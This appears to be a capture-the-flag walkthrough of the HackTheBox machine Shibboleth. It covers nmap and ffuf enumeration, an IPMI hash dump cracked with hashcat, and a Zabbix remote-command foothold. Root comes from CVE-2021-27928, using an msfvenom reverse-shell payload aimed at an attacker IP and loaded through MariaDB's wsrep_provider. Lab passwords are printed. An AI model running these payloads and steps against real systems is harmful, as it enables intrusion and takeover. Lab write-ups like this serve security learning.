In this Box we are going to enumerate a udp port and dump the administrator hash ,then we will crack it , using these credentials we will login to the zabbix web interface , using my exploit for this version of zabbix we will get a low-privilege shell. re-using same password will leverage our access to a user. for the root part we will exploit a vulnerable maria-db version

Scanning :

basic scanning :

nmap -A -T4 10.10.11.124

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

it was suspicious to have only this port , so i performed a udp scan as well :

sudo nmap -sU 10.10.11.124

PORT    STATE SERVICE
623/udp open  asf-rmcp

we can add shibboleth.htb to the /etc/hosts and move on to enumeration

Enumeration :

we can start performing some vhost enumeration :

ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb"  -fc 302

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

and add them to the /etc/hosts as well

10.10.11.124	shibboleth.htb	monitor.shibboleth.htb	zabbix.shibboleth.htb

the UDP port we have found eariler seems worthy to search for , and you can find this post from Hacktricks

we can use that to find the version first

then we can try that :

seems to be IPMI-2.0 UserAuth , from the same post we can see :

we can try that :

and it retrieves a hash , we can see if we can crack it.

from hashcat wiki here

hashcat -m 7300 hash2 /usr/share/wordlists/rockyou.txt

so now we have these credentials Administrator:ilovepumkinpie1

after this point i performed some enumeration to the IPMI like :

ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1  user list

and other But seems i went so far from the foothold :(

now we can take a look at the TCP port 80 we have found earlier

shibboleth.htb is not interesting at all , all pages are static

zabbix.shibboleth.htb has login page so obviously i tried the credentials we have

and we are in :

Foothold:

if you look at the footer you will find the zabbix version:

searching for it i found no exploits , you can start doing your research and will find at the documentation here the web interface can execute remote commands

actually to exploit it you will do a lot of searching in different options at the web page until you find the page.

at this time i was practicing python so why not to write my first published exploit ?

you will find it here

so let’s download it and try using the exploit

and after one minute:

Privilege escalation:

only one user exist which is ipmi_svc , and we have the password from the ipmi right , worthy trying it :

and it works

Root Access

Uploading Linpeas to the Box and start investigating the output :

and as we can see Maria DB is running locally only , and we can see linpeas found the username and the password to connect to the database, we can try interact with it

we can read the file except the comments , hence it won’t be applicable

cat /etc/zabbix/zabbix_server.conf | grep -v "#"

now let’s try interact with it :

 # password :bloooarskybluh
 mysql -u zabbix -D zabbix -p

and we are in :

this Maria-DB version we see at the banner is Vulnerable to OS command injection , and we can find the exploit here

following the steps:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.52 LPORT=1337 -f elf-so -o CVE-2021-27928.so

set the listener and move the .so file to the Box. then on the box login to the database then :

MariaDB [zabbix]> SET GLOBAL wsrep_provider="/dev/shm/CVE-2021-27928.so";